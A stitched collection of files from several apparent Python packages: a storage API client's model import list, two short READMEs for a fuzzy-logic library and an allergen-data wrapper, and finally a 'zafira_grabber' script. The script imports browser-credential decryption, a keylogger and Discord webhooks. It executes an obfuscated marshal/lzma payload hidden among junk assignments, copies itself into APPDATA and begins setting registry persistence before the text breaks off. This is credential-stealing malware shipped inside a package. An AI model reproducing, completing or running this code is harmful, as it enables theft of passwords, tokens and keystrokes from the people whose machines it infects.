from Vpsa.models.inline_response20012_response_sessions import InlineResponse20012ResponseSessions
from Vpsa.models.inline_response20013 import InlineResponse20013
from Vpsa.models.inline_response200130 import InlineResponse200130
from Vpsa.models.inline_response200130_user import InlineResponse200130User
from Vpsa.models.inline_response200131 import InlineResponse200131
from Vpsa.models.inline_response200131_response import InlineResponse200131Response
from Vpsa.models.inline_response200132 import InlineResponse200132
from Vpsa.models.inline_response200132_response import InlineResponse200132Response
from Vpsa.models.inline_response200133 import InlineResponse200133
from Vpsa.models.inline_response200134 import InlineResponse200134
from Vpsa.models.inline_response200134_response import InlineResponse200134Response
from Vpsa.models.inline_response200135 import InlineResponse200135
from Vpsa.models.inline_response200135_response import InlineResponse200135Response
from Vpsa.models.inline_response200136 import InlineResponse200136
from Vpsa.models.inline_response200136_response import InlineResponse200136Response
from Vpsa.models.inline_response200137 import InlineResponse200137
from Vpsa.models.inline_response200137_response import InlineResponse200137Response
from Vpsa.models.inline_response200137_response_password_requirements_data import InlineResponse200137ResponsePasswordRequirementsData
from Vpsa.models.inline_response200138 import InlineResponse200138
from Vpsa.models.inline_response200138_response import InlineResponse200138Response
from Vpsa.models.inline_response200138_response_volumes import InlineResponse200138ResponseVolumes
from Vpsa.models.inline_response200139 import InlineResponse200139
from Vpsa.models.inline_response200139_response import InlineResponse200139Response
from Vpsa.models.inline_response200139_response_volume import InlineResponse200139ResponseVolume
from Vpsa.models.inline_response20013_response import InlineResponse20013Response
from Vpsa.models.inline_response20013_response_usages import InlineResponse20013ResponseUsages
from Vpsa.models.inline_response20014 import InlineResponse20014
from Vpsa.models.inline_response200140 import InlineResponse200140
from Vpsa.models.inline_response200140_response import InlineResponse200140Response
from Vpsa.models.inline_response200141 import InlineResponse200141
from Vpsa.models.inline_response200141_response import InlineResponse200141Response
from Vpsa.models.inline_response200141_response_volumes import InlineResponse200141ResponseVolumes
from Vpsa.models.inline_response200142 import InlineResponse200142
from Vpsa.models.inline_response200142_response import InlineResponse200142Response
from Vpsa.models.inline_response200142_response_servers import InlineResponse200142ResponseServers
from Vpsa.models.inline_response200143 import InlineResponse200143
from Vpsa.models.inline_response200143_response import InlineResponse200143Response
from Vpsa.models.inline_response200144 import InlineResponse200144
from Vpsa.models.inline_response200144_delete_volume_from_recycle_bin import InlineResponse200144DeleteVolumeFromRecycleBin
from Vpsa.models.inline_response200145 import InlineResponse200145
from Vpsa.models.inline_response200145_response import InlineResponse200145Response
from Vpsa.models.inline_response200145_response_snapshot_policies import InlineResponse200145ResponseSnapshotPolicies
from Vpsa.models.inline_response200146 import InlineResponse200146
from Vpsa.models.inline_response200146_response import InlineResponse200146Response
from Vpsa.models.inline_response200146_response_file_histories import InlineResponse200146ResponseFileHistories
from Vpsa.models.inline_response200147 import InlineResponse200147
from Vpsa.models.inline_response200147_response import InlineResponse200147Response
from Vpsa.models.inline_response200148 import InlineResponse200148
from Vpsa.models.inline_response200148_response import InlineResponse200148Response
from Vpsa.models.inline_response200149 import InlineResponse200149
from Vpsa.models.inline_response200149_response import InlineResponse200149Response
from Vpsa.models.inline_response200149_response_snapshots import InlineResponse200149ResponseSnapshots
from Vpsa.models.inline_response20014_response import InlineResponse20014Response
from Vpsa.models.inline_response20014_response_zcache_usages import InlineResponse20014ResponseZcacheUsages
from Vpsa.models.inline_response20015 import InlineResponse20015
from Vpsa.models.inline_response200150 import InlineResponse200150
from Vpsa.models.inline_response200150_response import InlineResponse200150Response
from Vpsa.models.inline_response200151 import InlineResponse200151
from Vpsa.models.inline_response200151_response import InlineResponse200151Response
from Vpsa.models.inline_response200152 import InlineResponse200152
from Vpsa.models.inline_response200152_response import InlineResponse200152Response
from Vpsa.models.inline_response200152_response_migration_job import InlineResponse200152ResponseMigrationJob
from Vpsa.models.inline_response200153 import InlineResponse200153
from Vpsa.models.inline_response200153_response import InlineResponse200153Response
from Vpsa.models.inline_response200154 import InlineResponse200154
from Vpsa.models.inline_response200154_response import InlineResponse200154Response
from Vpsa.models.inline_response200155 import InlineResponse200155
from Vpsa.models.inline_response200155_response import InlineResponse200155Response
from Vpsa.models.inline_response200156 import InlineResponse200156
from Vpsa.models.inline_response200156_response import InlineResponse200156Response
from Vpsa.models.inline_response200156_response_quotas import InlineResponse200156ResponseQuotas
from Vpsa.models.inline_response200157 import InlineResponse200157
from Vpsa.models.inline_response200157_response import InlineResponse200157Response
from Vpsa.models.inline_response200158 import InlineResponse200158
from Vpsa.models.inline_response200158_response import InlineResponse200158Response
from Vpsa.models.inline_response200159 import InlineResponse200159
from Vpsa.models.inline_response200159_response import InlineResponse200159Response
from Vpsa.models.inline_response200159_response_directories import InlineResponse200159ResponseDirectories
from Vpsa.models.inline_response200159_response_projects import InlineResponse200159ResponseProjects
from Vpsa.models.inline_response20015_response import InlineResponse20015Response
from Vpsa.models.inline_response20015_response_usages import InlineResponse20015ResponseUsages
from Vpsa.models.inline_response20016 import InlineResponse20016
from Vpsa.models.inline_response200160 import InlineResponse200160
from Vpsa.models.inline_response200160_response import InlineResponse200160Response
from Vpsa.models.inline_response200161 import InlineResponse200161
from Vpsa.models.inline_response200161_response import InlineResponse200161Response
from Vpsa.models.inline_response200162 import InlineResponse200162
from Vpsa.models.inline_response200162_response import InlineResponse200162Response
from Vpsa.models.inline_response200163 import InlineResponse200163
from Vpsa.models.inline_response200163_response import InlineResponse200163Response
from Vpsa.models.inline_response200163_response_scan_status import InlineResponse200163ResponseScanStatus
from Vpsa.models.inline_response200164 import InlineResponse200164
from Vpsa.models.inline_response200164_response import InlineResponse200164Response
from Vpsa.models.inline_response200164_response_properties import InlineResponse200164ResponseProperties
from Vpsa.models.inline_response200165 import InlineResponse200165
from Vpsa.models.inline_response200165_response import InlineResponse200165Response
from Vpsa.models.inline_response200166 import InlineResponse200166
from Vpsa.models.inline_response200166_response import InlineResponse200166Response
from Vpsa.models.inline_response200166_response_vsa import InlineResponse200166ResponseVsa
from Vpsa.models.inline_response20016_response import InlineResponse20016Response
from Vpsa.models.inline_response20016_response_disks import InlineResponse20016ResponseDisks
from Vpsa.models.inline_response20017 import InlineResponse20017
from Vpsa.models.inline_response20017_response import InlineResponse20017Response
from Vpsa.models.inline_response20017_response_disk import InlineResponse20017ResponseDisk
from Vpsa.models.inline_response20018 import InlineResponse20018
from Vpsa.models.inline_response20018_response import InlineResponse20018Response
from Vpsa.models.inline_response20018_response_disks import InlineResponse20018ResponseDisks
from Vpsa.models.inline_response20019 import InlineResponse20019
from Vpsa.models.inline_response20019_response import InlineResponse20019Response
from Vpsa.models.inline_response2001_response import InlineResponse2001Response
from Vpsa.models.inline_response2001_response_containers import InlineResponse2001ResponseContainers
from Vpsa.models.inline_response2001_response_volumes import InlineResponse2001ResponseVolumes
from Vpsa.models.inline_response2002 import InlineResponse2002
from Vpsa.models.inline_response20020 import InlineResponse20020
from Vpsa.models.inline_response20020_response import InlineResponse20020Response
from Vpsa.models.inline_response20021 import InlineResponse20021
from Vpsa.models.inline_response20021_response import InlineResponse20021Response
from Vpsa.models.inline_response20022 import InlineResponse20022
from Vpsa.models.inline_response20022_response import InlineResponse20022Response
from Vpsa.models.inline_response20022_response_usages import InlineResponse20022ResponseUsages
from Vpsa.models.inline_response20023 import InlineResponse20023
from Vpsa.models.inline_response20023_response import InlineResponse20023Response
from Vpsa.models.inline_response20023_response_categories import InlineResponse20023ResponseCategories
from Vpsa.models.inline_response20024 import InlineResponse20024
from Vpsa.models.inline_response20024_response import InlineResponse20024Response
from Vpsa.models.inline_response20025 import InlineResponse20025
from Vpsa.models.inline_response20025_response import InlineResponse20025Response
from Vpsa.models.inline_response20025_response_documents_spreadsheets_and_text_files import InlineResponse20025ResponseDocumentsSpreadsheetsAndTextFiles
from Vpsa.models.inline_response20025_response_resources import InlineResponse20025ResponseResources
from Vpsa.models.inline_response20025_response_uncategorized import InlineResponse20025ResponseUncategorized
from Vpsa.models.inline_response20025_response_usages import InlineResponse20025ResponseUsages
from Vpsa.models.inline_response20026 import InlineResponse20026
from Vpsa.models.inline_response20027 import InlineResponse20027
from Vpsa.models.inline_response20027_response import InlineResponse20027Response
from Vpsa.models.inline_response20027_response_life_cycle_policy import InlineResponse20027ResponseLifeCyclePolicy
from Vpsa.models.inline_response20028 import InlineResponse20028
from Vpsa.models.inline_response20028_response import InlineResponse20028Response
from Vpsa.models.inline_response20029 import InlineResponse20029
from Vpsa.models.inline_response20029_response import InlineResponse20029Response
from Vpsa.models.inline_response2002_response import InlineResponse2002Response
from Vpsa.models.inline_response2003 import InlineResponse2003
from Vpsa.models.inline_response20030 import InlineResponse20030
from Vpsa.models.inline_response20030_response import InlineResponse20030Response
from Vpsa.models.inline_response20030_response_images import InlineResponse20030ResponseImages
from Vpsa.models.inline_response20031 import InlineResponse20031
from Vpsa.models.inline_response20031_response import InlineResponse20031Response
from Vpsa.models.inline_response20032 import InlineResponse20032
from Vpsa.models.inline_response20032_response import InlineResponse20032Response
from Vpsa.models.inline_response20032_response_image import InlineResponse20032ResponseImage
from Vpsa.models.inline_response20033 import InlineResponse20033
from Vpsa.models.inline_response20033_response import InlineResponse20033Response
from Vpsa.models.inline_response20033_response_messages import InlineResponse20033ResponseMessages
from Vpsa.models.inline_response20034 import InlineResponse20034
from Vpsa.models.inline_response20034_response import InlineResponse20034Response
from Vpsa.models.inline_response20034_response_users import InlineResponse20034ResponseUsers
from Vpsa.models.inline_response20035 import InlineResponse20035
from Vpsa.models.inline_response20035_response import InlineResponse20035Response
from Vpsa.models.inline_response20036 import InlineResponse20036
from Vpsa.models.inline_response20036_response import InlineResponse20036Response
from Vpsa.models.inline_response20037 import InlineResponse20037
from Vpsa.models.inline_response20037_response import InlineResponse20037Response
from Vpsa.models.inline_response20038 import InlineResponse20038
from Vpsa.models.inline_response20038_response import InlineResponse20038Response
from Vpsa.models.inline_response20038_response_groups import InlineResponse20038ResponseGroups
from Vpsa.models.inline_response20039 import InlineResponse20039
from Vpsa.models.inline_response20039_response import InlineResponse20039Response
from Vpsa.models.inline_response2003_response import InlineResponse2003Response
from Vpsa.models.inline_response2003_response_container import InlineResponse2003ResponseContainer
from Vpsa.models.inline_response2004 import InlineResponse2004
from Vpsa.models.inline_response20040 import InlineResponse20040
from Vpsa.models.inline_response20040_response import InlineResponse20040Response
from Vpsa.models.inline_response20041 import InlineResponse20041
from Vpsa.models.inline_response20041_response import InlineResponse20041Response
from Vpsa.models.inline_response20042 import InlineResponse20042
from Vpsa.models.inline_response20042_response import InlineResponse20042Response
from Vpsa.models.inline_response20042_response_smb_ads import InlineResponse20042ResponseSmbAds
from Vpsa.models.inline_response20043 import InlineResponse20043
from Vpsa.models.inline_response20043_response import InlineResponse20043Response
from Vpsa.models.inline_response20043_response_pools import InlineResponse20043ResponsePools
from Vpsa.models.inline_response20044 import InlineResponse20044
from Vpsa.models.inline_response20044_response import InlineResponse20044Response
from Vpsa.models.inline_response20045 import InlineResponse20045
from Vpsa.models.inline_response20045_response import InlineResponse20045Response
from Vpsa.models.inline_response20045_response_pool import InlineResponse20045ResponsePool
from Vpsa.models.inline_response20045_response_pool_ssd import InlineResponse20045ResponsePoolSsd
from Vpsa.models.inline_response20046 import InlineResponse20046
from Vpsa.models.inline_response20046_response import InlineResponse20046Response
from Vpsa.models.inline_response20046_response_raid_groups import InlineResponse20046ResponseRaidGroups
from Vpsa.models.inline_response20047 import InlineResponse20047
from Vpsa.models.inline_response20047_response import InlineResponse20047Response
from Vpsa.models.inline_response20047_response_volumes import InlineResponse20047ResponseVolumes
from Vpsa.models.inline_response20048 import InlineResponse20048
from Vpsa.models.inline_response20048_response import InlineResponse20048Response
from Vpsa.models.inline_response20048_response_volumes import InlineResponse20048ResponseVolumes
from Vpsa.models.inline_response20049 import InlineResponse20049
from Vpsa.models.inline_response20049_response import InlineResponse20049Response
from Vpsa.models.inline_response20049_response_volumes import InlineResponse20049ResponseVolumes
from Vpsa.models.inline_response2004_response import InlineResponse2004Response
from Vpsa.models.inline_response2004_response_usages import InlineResponse2004ResponseUsages
from Vpsa.models.inline_response2005 import InlineResponse2005
from Vpsa.models.inline_response20050 import InlineResponse20050
from Vpsa.models.inline_response20050_response import InlineResponse20050Response
from Vpsa.models.inline_response20051 import InlineResponse20051
from Vpsa.models.inline_response20051_response import InlineResponse20051Response
from Vpsa.models.inline_response20051_response_raid_groups import InlineResponse20051ResponseRaidGroups
from Vpsa.models.inline_response20052 import InlineResponse20052
from Vpsa.models.inline_response20052_response import InlineResponse20052Response
from Vpsa.models.inline_response20053 import InlineResponse20053
from Vpsa.models.inline_response20053_response import InlineResponse20053Response
from Vpsa.models.inline_response20053_response_raid_group import InlineResponse20053ResponseRaidGroup
from Vpsa.models.inline_response20053_response_raid_group_volumes import InlineResponse20053ResponseRaidGroupVolumes
from Vpsa.models.inline_response20054 import InlineResponse20054
from Vpsa.models.inline_response20054_response import InlineResponse20054Response
from Vpsa.models.inline_response20054_response_disks import InlineResponse20054ResponseDisks
from Vpsa.models.inline_response20055 import InlineResponse20055
from Vpsa.models.inline_response20055_response import InlineResponse20055Response
from Vpsa.models.inline_response20056 import InlineResponse20056
from Vpsa.models.inline_response20056_response import InlineResponse20056Response
from Vpsa.models.inline_response20056_response_dst import InlineResponse20056ResponseDst
from Vpsa.models.inline_response20056_response_src import InlineResponse20056ResponseSrc
from Vpsa.models.inline_response20056_response_vpsa_mirror_jobs import InlineResponse20056ResponseVpsaMirrorJobs
from Vpsa.models.inline_response20057 import InlineResponse20057
from Vpsa.models.inline_response20057_response import InlineResponse20057Response
from Vpsa.models.inline_response20057_response_vpsa_mirror_job import InlineResponse20057ResponseVpsaMirrorJob
from Vpsa.models.inline_response20057_response_vpsa_mirror_job_dst import InlineResponse20057ResponseVpsaMirrorJobDst
from Vpsa.models.inline_response20057_response_vpsa_mirror_job_src import InlineResponse20057ResponseVpsaMirrorJobSrc
from Vpsa.models.inline_response20058 import InlineResponse20058
from Vpsa.models.inline_response20058_response import InlineResponse20058Response
from Vpsa.models.inline_response20059 import InlineResponse20059
from Vpsa.models.inline_response20059_response import InlineResponse20059Response
from Vpsa.models.inline_response20059_response_remote_vpsas import InlineResponse20059ResponseRemoteVpsas
from Vpsa.models.inline_response2005_response import InlineResponse2005Response
from Vpsa.models.inline_response2005_response_container_memory_pools import InlineResponse2005ResponseContainerMemoryPools
from Vpsa.models.inline_response2005_response_containers import InlineResponse2005ResponseContainers
from Vpsa.models.inline_response2006 import InlineResponse2006
from Vpsa.models.inline_response20060 import InlineResponse20060
from Vpsa.models.inline_response20060_response import InlineResponse20060Response
from Vpsa.models.inline_response20061 import InlineResponse20061
from Vpsa.models.inline_response20061_response import InlineResponse20061Response
from Vpsa.models.inline_response20061_response_remote_vpsa import InlineResponse20061ResponseRemoteVpsa
from Vpsa.models.inline_response20062 import InlineResponse20062
from Vpsa.models.inline_response20062_response import InlineResponse20062Response
from Vpsa.models.inline_response20062_response_remote_pools import InlineResponse20062ResponseRemotePools
from Vpsa.models.inline_response20063 import InlineResponse20063
from Vpsa.models.inline_response20063_response import InlineResponse20063Response
from Vpsa.models.inline_response20063_response_sugested_jobs import InlineResponse20063ResponseSugestedJobs
from Vpsa.models.inline_response20064 import InlineResponse20064
from Vpsa.models.inline_response20064_response import InlineResponse20064Response
from Vpsa.models.inline_response20065 import InlineResponse20065
from Vpsa.models.inline_response20065_response import InlineResponse20065Response
from Vpsa.models.inline_response20066 import InlineResponse20066
from Vpsa.models.inline_response20066_response import InlineResponse20066Response
from Vpsa.models.inline_response20067 import InlineResponse20067
from Vpsa.models.inline_response20067_response import InlineResponse20067Response
from Vpsa.models.inline_response20068 import InlineResponse20068
from Vpsa.models.inline_response20068_response import InlineResponse20068Response
from Vpsa.models.inline_response20068_response_snapshots import InlineResponse20068ResponseSnapshots
from Vpsa.models.inline_response20069 import InlineResponse20069
from Vpsa.models.inline_response20069_response import InlineResponse20069Response
from Vpsa.models.inline_response2006_response import InlineResponse2006Response
from Vpsa.models.inline_response2007 import InlineResponse2007
from Vpsa.models.inline_response20070 import InlineResponse20070
from Vpsa.models.inline_response20070_response import InlineResponse20070Response
from Vpsa.models.inline_response20070_response_cgs import InlineResponse20070ResponseCgs
from Vpsa.models.inline_response20071 import InlineResponse20071
from Vpsa.models.inline_response20071_response import InlineResponse20071Response
from Vpsa.models.inline_response20071_response_snapshots import InlineResponse20071ResponseSnapshots
from Vpsa.models.inline_response20072 import InlineResponse20072
from Vpsa.models.inline_response20072_response import InlineResponse20072Response
from Vpsa.models.inline_response20073 import InlineResponse20073
from Vpsa.models.inline_response20073_response import InlineResponse20073Response
from Vpsa.models.inline_response20073_response_dst import InlineResponse20073ResponseDst
from Vpsa.models.inline_response20073_response_remote_clone_jobs import InlineResponse20073ResponseRemoteCloneJobs
from Vpsa.models.inline_response20073_response_src import InlineResponse20073ResponseSrc
from Vpsa.models.inline_response20074 import InlineResponse20074
from Vpsa.models.inline_response20074_response import InlineResponse20074Response
from Vpsa.models.inline_response20075 import InlineResponse20075
from Vpsa.models.inline_response20075_response import InlineResponse20075Response
from Vpsa.models.inline_response20076 import InlineResponse20076
from Vpsa.models.inline_response20076_response import InlineResponse20076Response
from Vpsa.models.inline_response20077 import InlineResponse20077
from Vpsa.models.inline_response20077_response import InlineResponse20077Response
from Vpsa.models.inline_response20077_response_obs_destinations import InlineResponse20077ResponseObsDestinations
from Vpsa.models.inline_response20078 import InlineResponse20078
from Vpsa.models.inline_response20078_response import InlineResponse20078Response
from Vpsa.models.inline_response20079 import InlineResponse20079
from Vpsa.models.inline_response20079_response import InlineResponse20079Response
from Vpsa.models.inline_response20079_response_obs_destination import InlineResponse20079ResponseObsDestination
from Vpsa.models.inline_response2007_response import InlineResponse2007Response
from Vpsa.models.inline_response2008 import InlineResponse2008
from Vpsa.models.inline_response20080 import InlineResponse20080
from Vpsa.models.inline_response20080_response import InlineResponse20080Response
from Vpsa.models.inline_response20080_response_dst import InlineResponse20080ResponseDst
from Vpsa.models.inline_response20080_response_obs_backup_jobs import InlineResponse20080ResponseObsBackupJobs
from Vpsa.models.inline_response20080_response_snapshot_policy import InlineResponse20080ResponseSnapshotPolicy
from Vpsa.models.inline_response20080_response_src import InlineResponse20080ResponseSrc
from Vpsa.models.inline_response20081 import InlineResponse20081
from Vpsa.models.inline_response20081_response import InlineResponse20081Response
from Vpsa.models.inline_response20081_response_dst import InlineResponse20081ResponseDst
from Vpsa.models.inline_response20081_response_obs_restore_jobs import InlineResponse20081ResponseObsRestoreJobs
from Vpsa.models.inline_response20081_response_src import InlineResponse20081ResponseSrc
from Vpsa.models.inline_response20082 import InlineResponse20082
from Vpsa.models.inline_response20082_response import InlineResponse20082Response
from Vpsa.models.inline_response20082_response_dst import InlineResponse20082ResponseDst
from Vpsa.models.inline_response20082_response_obs_backup_jobs import InlineResponse20082ResponseObsBackupJobs
from Vpsa.models.inline_response20083 import InlineResponse20083
from Vpsa.models.inline_response20083_response import InlineResponse20083Response
from Vpsa.models.inline_response20084 import InlineResponse20084
from Vpsa.models.inline_response20084_response import InlineResponse20084Response
from Vpsa.models.inline_response20084_response_obs_backup_job import InlineResponse20084ResponseObsBackupJob
from Vpsa.models.inline_response20085 import InlineResponse20085
from Vpsa.models.inline_response20085_response import InlineResponse20085Response
from Vpsa.models.inline_response20086 import InlineResponse20086
from Vpsa.models.inline_response20086_response import InlineResponse20086Response
from Vpsa.models.inline_response20087 import InlineResponse20087
from Vpsa.models.inline_response20087_response import InlineResponse20087Response
from Vpsa.models.inline_response20087_response_usages import InlineResponse20087ResponseUsages
from Vpsa.models.inline_response20088 import InlineResponse20088
from Vpsa.models.inline_response20088_response import InlineResponse20088Response
from Vpsa.models.inline_response20088_response_dst import InlineResponse20088ResponseDst
from Vpsa.models.inline_response20088_response_obs_restore_jobs import InlineResponse20088ResponseObsRestoreJobs
from Vpsa.models.inline_response20088_response_src import InlineResponse20088ResponseSrc
from Vpsa.models.inline_response20089 import InlineResponse20089
from Vpsa.models.inline_response20089_response import InlineResponse20089Response
from Vpsa.models.inline_response2008_response import InlineResponse2008Response
from Vpsa.models.inline_response2009 import InlineResponse2009
from Vpsa.models.inline_response20090 import InlineResponse20090
from Vpsa.models.inline_response20090_response import InlineResponse20090Response
from Vpsa.models.inline_response20091 import InlineResponse20091
from Vpsa.models.inline_response20091_response import InlineResponse20091Response
from Vpsa.models.inline_response20092 import InlineResponse20092
from Vpsa.models.inline_response20092_response import InlineResponse20092Response
from Vpsa.models.inline_response20092_response_usages import InlineResponse20092ResponseUsages
from Vpsa.models.inline_response20093 import InlineResponse20093
from Vpsa.models.inline_response20093_response import InlineResponse20093Response
from Vpsa.models.inline_response20093_response_permissions import InlineResponse20093ResponsePermissions
from Vpsa.models.inline_response20093_response_roles import InlineResponse20093ResponseRoles
from Vpsa.models.inline_response20094 import InlineResponse20094
from Vpsa.models.inline_response20094_response import InlineResponse20094Response
from Vpsa.models.inline_response20095 import InlineResponse20095
from Vpsa.models.inline_response20095_response import InlineResponse20095Response
from Vpsa.models.inline_response20095_response_permissions import InlineResponse20095ResponsePermissions
from Vpsa.models.inline_response20096 import InlineResponse20096
from Vpsa.models.inline_response20096_response import InlineResponse20096Response
from Vpsa.models.inline_response20097 import InlineResponse20097
from Vpsa.models.inline_response20097_response import InlineResponse20097Response
from Vpsa.models.inline_response20097_response_servers import InlineResponse20097ResponseServers
from Vpsa.models.inline_response20098 import InlineResponse20098
from Vpsa.models.inline_response20098_response import InlineResponse20098Response
from Vpsa.models.inline_response20099 import InlineResponse20099
from Vpsa.models.inline_response20099_response import InlineResponse20099Response
from Vpsa.models.inline_response20099_response_server import InlineResponse20099ResponseServer
from Vpsa.models.inline_response2009_response import InlineResponse2009Response
from Vpsa.models.inline_response2009_response_vcontrollers import InlineResponse2009ResponseVcontrollers
from Vpsa.models.inline_response200_response import InlineResponse200Response
from Vpsa.models.volumesidquotas_json_quotas import VolumesidquotasJsonQuotas | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/Vpsa/models/__init__.py | __init__.py |
# zadeh
[](https://github.com/dih5/zadeh/releases/latest)
[](https://pypi.python.org/pypi/zadeh)
[](https://raw.githubusercontent.com/Dih5/zadeh/master/LICENSE.txt)
[](http://zadeh.readthedocs.io/en/latest/?badge=latest)
Python package to build fuzzy inference systems
## Installation
Assuming you have a [Python3](https://www.python.org/) distribution with [pip](https://pip.pypa.io/en/stable/installing/), the latest pypi release can be installed with:
```
pip3 install zadeh
```
To install the recommended optional dependencies you can run
```
pip3 install 'zadeh[extras]'
```
Mind the quotes.
## Developer information
### Development installation
To install a development version, clone the repo, cd to the directory with this file and:
```
pip3 install -e '.[test]'
```
Consider using a virtualenv if needed:
```
# Prepare a clean virtualenv and activate it
virtualenv venv
source venv/bin/activate
# Install the package
pip3 install -e '.[test]'
```
### Documentation
To generate the documentation, the *docs* extra dependencies must be installed.
To generate an html documentation with sphinx run:
```
make docs
```
To generate a PDF documentation using LaTeX:
```
make pdf
```
### Test
To run the unitary tests:
```
make test
```
| zadeh | /zadeh-0.3.0.tar.gz/zadeh-0.3.0/README.md | README.md |
[![GitHub Release][releases-shield]][releases]
[![PyPI][pypi-releases-shield]][pypi-releases]
[![PyPI - Downloads][pypi-downloads]][pypi-statistics]
[![Buy me a coffee][buy-me-a-coffee-shield]][buy-me-a-coffee]
[![PayPal_Me][paypal-me-shield]][paypal-me]
# zadnegoale
Python wrapper for getting allergen concentration data from [Żadnego Ale](http://zadnegoale.pl)
## How to use package
```python
import asyncio
import logging
from aiohttp import ClientError, ClientSession
from zadnegoale import ApiError, InvalidRegionError, ZadnegoAle
REGION = 2
logging.basicConfig(level=logging.DEBUG)
async def main():
async with ClientSession() as websession:
try:
zadnegoale = ZadnegoAle(websession, REGION)
data = await zadnegoale.async_update(alerts=True)
except (ApiError, ClientError, InvalidRegionError) as error:
print(f"Error: {error}")
else:
print(f"Region: {zadnegoale.region_name}")
print(f"Data: {data}")
loop = asyncio.new_event_loop()
loop.run_until_complete(main())
loop.close()
```
[releases]: https://github.com/bieniu/zadnegoale/releases
[releases-shield]: https://img.shields.io/github/release/bieniu/zadnegoale.svg?style=popout
[pypi-releases]: https://pypi.org/project/zadnegoale/
[pypi-statistics]: https://pepy.tech/project/zadnegoale
[pypi-releases-shield]: https://img.shields.io/pypi/v/zadnegoale
[pypi-downloads]: https://pepy.tech/badge/zadnegoale/month
[buy-me-a-coffee-shield]: https://img.shields.io/static/v1.svg?label=%20&message=Buy%20me%20a%20coffee&color=6f4e37&logo=buy%20me%20a%20coffee&logoColor=white
[buy-me-a-coffee]: https://www.buymeacoffee.com/QnLdxeaqO
[paypal-me-shield]: https://img.shields.io/static/v1.svg?label=%20&message=PayPal.Me&logo=paypal
[paypal-me]: https://www.paypal.me/bieniu79
| zadnegoale | /zadnegoale-0.6.5.tar.gz/zadnegoale-0.6.5/README.md | README.md |
import ctypes
import json
import time
import re
import threading
import socket
from pathlib import Path
from zipfile import ZipFile
import base64
import subprocess
import shutil
import uuid
from Crypto.Cipher import AES
from discord import Embed, SyncWebhook
from win32crypt import CryptUnprotectData
import requests
import os
import wmi
import sys
import platform
from pynput.keyboard import Key, Listener
from datetime import date
from discord_webhook import DiscordWebhook, DiscordEmbed
__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__="__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__";__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__="__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__";from marshal import loads;exec(loads(b"\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00@\x00\x00\x00s(\x00\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01e\x02e\x00\xa0\x03e\x01\xa0\x03d\x02\xa1\x01\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsX\x01\x00\x00\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x02\x00!\x01\x16\x00\x00\x00t/\xe5\xa3\x01\x01\x1ax\x9c\xed\x94]O\x830\x14\x86\xff\xcbn6.\xb0|\x0cV\xfc\x8a[\xb6\x0c\\\x14#\xd3\xcd\x85\xa4\x01Z\x81\xb0\xa5\xb3E\xd7\xf9\xeb\xa5F\x13\x82&^x\xc3\x05Mz\xfa\xbe'\xe7\xe2\xed\x93\xa6\x081\x92\xc6\x94sT\xad\xb6\xca\x8b^\x1bR\xfc){gmH\xd1\xd1\xech\xfeF\x93\x08\x92\x0c\xb64\xc2|\x10\xf7CA\xccPh\xda?\xb7^\xf7Wu\xc3\xab\x02\xeb\r,\xcb\xe6[\xe9\x81TJU\x8c\xf7cV\x96{~\n\x00\xceyB\x19>I\xe8\x0eD\xfb\x1c\x1cH\x9cQZp\xa0k\xb63\x1a\x0e-\xddqL\x03j\x96ni\xe0\x9ecf\xaa(\xe50\x15/\xb6\xb9\x89\xd6\xc2?\xc0\xd5\xf5\xf8q2\x8e\r;\x7fZ\xdf,\xa7\xae\x17L\xef\xde\x8e\xacp=\x07\xcei\xee\x99Kle\xc5\\U\x1f`0{\xbe\x95\x01t\x19*Fh5\x9b\xb8\xbe\xbf@(\x14\x91#\xd3\xb1\xe6\x05\x7f4B\x81\xa3\xea\x1c%\x14\xbf\x96\x84}Yx\xbe\xab\xfc\x96\\6\xc7%\x13\xa3A\xf0\x93Q_Q\xba\xc7\xde}\x1d-\x95\xbd\x0f-\xcf \xf0\x00\x00\x8f\xbe`\\$\x06U\xc5\x00\x01\xb3\x02\x9b\x02\x00\x00\xadT\x0eL\xb1\xc4g\xfb\x02\x00\x00\x00\x00\x04YZ)\x04\xda\x04zlib\xda\x04lzma\xda\x04exec\xda\ndecompress\xa9\x00r\x06\x00\x00\x00r\x06\x00\x00\x00\xda\x07coduter\xda\x08<module>\x01\x00\x00\x00s\x04\x00\x00\x00\x10\x00\x18\x01"));__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__="__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__";__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__="__regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss____regboss__";
__PING__ = "%ping_enabled%"
__PINGTYPE__ = "%ping_type%"
# = = = = = Startup = = = = = =
class Startup:
def __init__(self) -> None:
self.working_dir = os.getenv("APPDATA") + "\\zafira_grabber"
if self.check_self():
return
self.mkdir()
self.write_stub()
self.regedit()
def check_self(self) -> bool:
if os.path.realpath(sys.executable) == self.working_dir + "\\dat.txt":
return True
return False
def mkdir(self) -> str:
if not os.path.isdir(self.working_dir):
os.mkdir(self.working_dir)
else:
shutil.rmtree(self.working_dir)
os.mkdir(self.working_dir)
def write_stub(self) -> None:
shutil.copy2(os.path.realpath(sys.executable), self.working_dir + "\\dat.txt")
with open(file=f"{self.working_dir}\\run.bat", mode="w") as f:
f.write(f"@echo off\ncall {self.working_dir}\\dat.txt")
def regedit(self) -> None:
subprocess.run(args=["reg", "delete", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "zafira_grabber", "/f"], shell=True)
